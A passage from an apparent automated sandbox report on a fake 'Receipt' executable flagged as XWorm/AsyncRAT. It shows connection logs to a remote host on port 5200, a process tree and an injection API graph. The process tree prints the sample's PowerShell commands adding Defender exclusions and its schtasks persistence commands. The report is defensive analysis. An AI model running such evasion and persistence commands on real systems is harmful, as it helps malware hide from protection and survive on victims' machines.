                                                                Dec 31, 2024 13:31:19.713130951 CET520050043154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:19.713928938 CET520050044154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:19.713987112 CET500445200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:19.743900061 CET500445200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:19.748661041 CET520050044154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:21.097089052 CET520050044154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:21.097162008 CET500445200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:24.814543009 CET500445200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:24.816337109 CET500455200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:24.819463015 CET520050044154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:24.823327065 CET520050045154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:24.823394060 CET500455200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:24.852844954 CET500455200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:24.858863115 CET520050045154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:26.239078999 CET520050045154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:26.239154100 CET500455200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:29.892308950 CET500455200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:29.893136024 CET500465200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:29.897232056 CET520050045154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:29.897926092 CET520050046154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:29.897999048 CET500465200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:30.043037891 CET500465200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:30.047818899 CET520050046154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:30.204822063 CET500465200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:30.209681988 CET520050046154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:31.285463095 CET520050046154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:31.285518885 CET500465200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:35.392205000 CET500465200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:35.394139051 CET500475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:35.397062063 CET520050046154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:35.398967981 CET520050047154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:35.399029970 CET500475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:35.433307886 CET500475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:35.438121080 CET520050047154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:35.454901934 CET500475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:35.459680080 CET520050047154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:35.470472097 CET500475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:35.475282907 CET520050047154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:35.532843113 CET500475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:35.537661076 CET520050047154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:35.704931021 CET500475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:35.709795952 CET520050047154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:36.801862001 CET520050047154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:36.801937103 CET500475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:40.735876083 CET500475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:40.739497900 CET500485200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:40.740760088 CET520050047154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:40.744369984 CET520050048154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:40.744503021 CET500485200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:40.813427925 CET500485200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:40.818182945 CET520050048154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:42.148250103 CET520050048154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:42.149209976 CET500485200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:45.862332106 CET500485200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:45.864850998 CET500495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:45.867167950 CET520050048154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:45.869673014 CET520050049154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:45.869752884 CET500495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:46.124030113 CET500495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:46.129040003 CET520050049154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:47.277570963 CET520050049154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:47.277641058 CET500495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:51.157812119 CET500495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:51.161258936 CET500505200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:51.162942886 CET520050049154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:51.166035891 CET520050050154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:51.166100979 CET500505200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:51.211040020 CET500505200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:51.215883017 CET520050050154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:51.236032009 CET500505200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:51.240884066 CET520050050154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:52.550896883 CET520050050154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:52.550993919 CET500505200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:56.236337900 CET500505200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:56.239016056 CET500515200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:56.241199970 CET520050050154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:56.243792057 CET520050051154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:56.243958950 CET500515200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:56.338366985 CET500515200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:31:56.343158960 CET520050051154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:57.650198936 CET520050051154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:31:57.650274038 CET500515200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:01.455841064 CET500515200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:01.457478046 CET500525200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:01.460870981 CET520050051154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:01.462285995 CET520050052154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:01.462357998 CET500525200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:01.845232964 CET500525200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:01.850127935 CET520050052154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:02.847423077 CET520050052154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:02.847498894 CET500525200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:07.329713106 CET500525200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:07.334623098 CET520050052154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:07.336709976 CET500535200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:07.341551065 CET520050053154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:07.341628075 CET500535200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:07.366065979 CET500535200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:07.370821953 CET520050053154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:08.740092993 CET520050053154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:08.740505934 CET500535200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:12.501746893 CET500535200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:12.503000975 CET500545200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:12.506717920 CET520050053154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:12.507877111 CET520050054154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:12.508110046 CET500545200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:12.762531996 CET500545200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:12.767360926 CET520050054154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:13.915994883 CET520050054154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:13.922139883 CET500545200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:17.814120054 CET500545200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:17.818991899 CET520050054154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:17.822031021 CET500555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:17.826867104 CET520050055154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:17.826946974 CET500555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:17.887653112 CET500555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:17.892549038 CET520050055154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:18.017455101 CET500555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:18.022295952 CET520050055154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:18.033123970 CET500555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:18.038084984 CET520050055154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:18.064145088 CET500555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:18.068895102 CET520050055154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:19.222969055 CET520050055154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:19.223078966 CET500555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:23.098418951 CET500555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:23.103430986 CET520050055154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:23.105778933 CET500565200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:23.110626936 CET520050056154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:23.112138987 CET500565200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:23.405764103 CET500565200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:23.410762072 CET520050056154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:24.504471064 CET520050056154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:24.504529953 CET500565200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:28.658221006 CET500565200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:28.660034895 CET500575200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:28.663074970 CET520050056154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:28.664869070 CET520050057154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:28.668180943 CET500575200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:28.723372936 CET500575200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:28.728202105 CET520050057154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:29.314249039 CET500575200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:29.319108009 CET520050057154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:30.053278923 CET520050057154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:30.053344011 CET500575200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:34.481625080 CET500575200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:34.483974934 CET500585200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:34.486452103 CET520050057154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:34.488893032 CET520050058154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:34.488977909 CET500585200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:34.645347118 CET500585200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:34.650242090 CET520050058154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:35.897083998 CET520050058154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:35.897167921 CET500585200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:40.111052990 CET500585200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:40.112348080 CET500595200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:40.115854025 CET520050058154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:40.117090940 CET520050059154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:40.117145061 CET500595200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:40.150762081 CET500595200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:40.155534983 CET520050059154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:41.520095110 CET520050059154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:41.520163059 CET500595200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.173573017 CET500595200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.176352978 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.178381920 CET520050059154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:45.181200981 CET520050060154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:45.181288004 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.227878094 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.232640028 CET520050060154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:45.673619986 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:45.678513050 CET520050060154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:46.568617105 CET520050060154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:46.570352077 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.736315012 CET500605200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.740644932 CET500615200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.741197109 CET520050060154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:50.745485067 CET520050061154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:50.745539904 CET500615200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.780961037 CET500615200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.785725117 CET520050061154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:50.908138990 CET500615200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:32:50.912951946 CET520050061154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:52.165106058 CET520050061154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:32:52.165174007 CET500615200192.168.2.4154.39.0.150

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:07:28:53
                                                                Start date:31/12/2024
                                                                Path:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Receipt-#202431029B.exe"
                                                                Imagebase:0x160000
                                                                File size:633'344 bytes
                                                                MD5 hash:5322ECE916271AD6517A171BE2A5A378
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"
                                                                Imagebase:0x5b0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"
                                                                Imagebase:0x5b0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp"
                                                                Imagebase:0x5a0000
                                                                File size:187'904 bytes
                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:07:28:55
                                                                Start date:31/12/2024
                                                                Path:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Receipt-#202431029B.exe"
                                                                Imagebase:0xad0000
                                                                File size:633'344 bytes
                                                                MD5 hash:5322ECE916271AD6517A171BE2A5A378
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                General

                                                                Target ID:9
                                                                Start time:07:28:56
                                                                Start date:31/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                Imagebase:0x800000
                                                                File size:633'344 bytes
                                                                MD5 hash:5322ECE916271AD6517A171BE2A5A378
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 74%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:07:28:57
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0x7ff693ab0000
                                                                File size:496'640 bytes
                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:07:28:59
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp"
                                                                Imagebase:0x5a0000
                                                                File size:187'904 bytes
                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:07:28:59
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:07:29:00
                                                                Start date:31/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\XetHVID.exe"
                                                                Imagebase:0x860000
                                                                File size:633'344 bytes
                                                                MD5 hash:5322ECE916271AD6517A171BE2A5A378
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:20
                                                                Start time:07:32:53
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 2132
                                                                Imagebase:0x910000
                                                                File size:483'680 bytes
                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:9%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:1.7%
                                                                  Total number of Nodes:238
                                                                  Total number of Limit Nodes:15
                                                                  execution_graph 51013 a2d580 51014 a2d5c6 GetCurrentProcess 51013->51014 51016 a2d618 GetCurrentThread 51014->51016 51018 a2d611 51014->51018 51017 a2d655 GetCurrentProcess 51016->51017 51019 a2d64e 51016->51019 51022 a2d68b 51017->51022 51018->51016 51019->51017 51020 a2d6b3 GetCurrentThreadId 51021 a2d6e4 51020->51021 51022->51020 51292 72e77c8 51293 72e77e0 51292->51293 51294 72e786d 51293->51294 51296 757971a 51293->51296 51297 75796b5 51296->51297 51300 7579777 51296->51300 51297->51294 51298 75798db 51298->51294 51299 7574188 PostMessageW 51299->51300 51300->51298 51300->51299 51023 75762f0 51028 7578449 51023->51028 51033 75784c8 51023->51033 51037 75784b9 51023->51037 51024 75762ff 51029 75784bc 51028->51029 51031 7578452 51028->51031 51041 757850c 51029->51041 51031->51024 51034 75784dd 51033->51034 51036 757850c 12 API calls 51034->51036 51035 75784ef 51035->51024 51036->51035 51038 75784bc 51037->51038 51040 757850c 12 API calls 51038->51040 51039 75784ef 51039->51024 51040->51039 51042 7578522 51041->51042 51066 7578e36 51042->51066 51071 7579348 51042->51071 51076 7578b48 51042->51076 51085 7578b6d 51042->51085 51090 7578f8f 51042->51090 51095 7578fc0 51042->51095 51100 7578b81 51042->51100 51105 7578982 51042->51105 51114 7578c24 51042->51114 51119 7578b05 51042->51119 51124 7578ec6 51042->51124 51129 7578e26 51042->51129 51134 75793b8 51042->51134 51139 7578dd8 51042->51139 51143 7578a7a 51042->51143 51148 7578bba 51042->51148 51153 7578adc 51042->51153 51167 7578a12 51042->51167 51176 7578c12 51042->51176 51184 7578cb2 51042->51184 51189 7578eb3 51042->51189 51194 7578ab4 51042->51194 51043 75784ef 51043->51024 51067 7578dd7 51066->51067 51199 7575af0 51067->51199 51203 7575ae8 51067->51203 51068 7578e06 51068->51043 51072 7579357 51071->51072 51207 7575470 51072->51207 51211 7575468 51072->51211 51073 7579383 51073->51073 51077 7578b4a 51076->51077 51081 7575af0 WriteProcessMemory 51077->51081 51082 7575ae8 WriteProcessMemory 51077->51082 51078 75790c9 51078->51043 51079 7578b0f 51079->51078 51083 7575470 ResumeThread 51079->51083 51084 7575468 ResumeThread 51079->51084 51080 7579383 51081->51079 51082->51079 51083->51080 51084->51080 51086 7578b7a 51085->51086 51088 7575470 ResumeThread 51086->51088 51089 7575468 ResumeThread 51086->51089 51087 7579383 51088->51087 51089->51087 51091 7578a83 51090->51091 51091->51090 51215 7575be0 51091->51215 51219 7575bd9 51091->51219 51092 7579430 51092->51043 51096 7578bd1 51095->51096 51097 7578bf2 51095->51097 51098 7575af0 WriteProcessMemory 51096->51098 51099 7575ae8 WriteProcessMemory 51096->51099 51098->51097 51099->51097 51101 7578ab5 51100->51101 51103 7575470 ResumeThread 51101->51103 51104 7575468 ResumeThread 51101->51104 51102 7579383 51103->51102 51104->51102 51106 757898d 51105->51106 51223 7575d6c 51106->51223 51227 7575d78 51106->51227 51107 75791ef 51107->51043 51108 7579430 51108->51043 51109 7578a5b 51109->51107 51112 7575be0 ReadProcessMemory 51109->51112 51113 7575bd9 ReadProcessMemory 51109->51113 51112->51108 51113->51108 51115 7578c29 51114->51115 51116 7578d85 51115->51116 51231 7575520 51115->51231 51235 7575519 51115->51235 51116->51043 51120 7578b0f 51119->51120 51122 7575470 ResumeThread 51120->51122 51123 7575468 ResumeThread 51120->51123 51121 7579383 51122->51121 51123->51121 51126 7578a83 51124->51126 51125 7579430 51125->51043 51127 7575be0 ReadProcessMemory 51126->51127 51128 7575bd9 ReadProcessMemory 51126->51128 51127->51125 51128->51125 51131 7578cca 51129->51131 51130 75790ef 51130->51043 51131->51130 51239 7575a30 51131->51239 51243 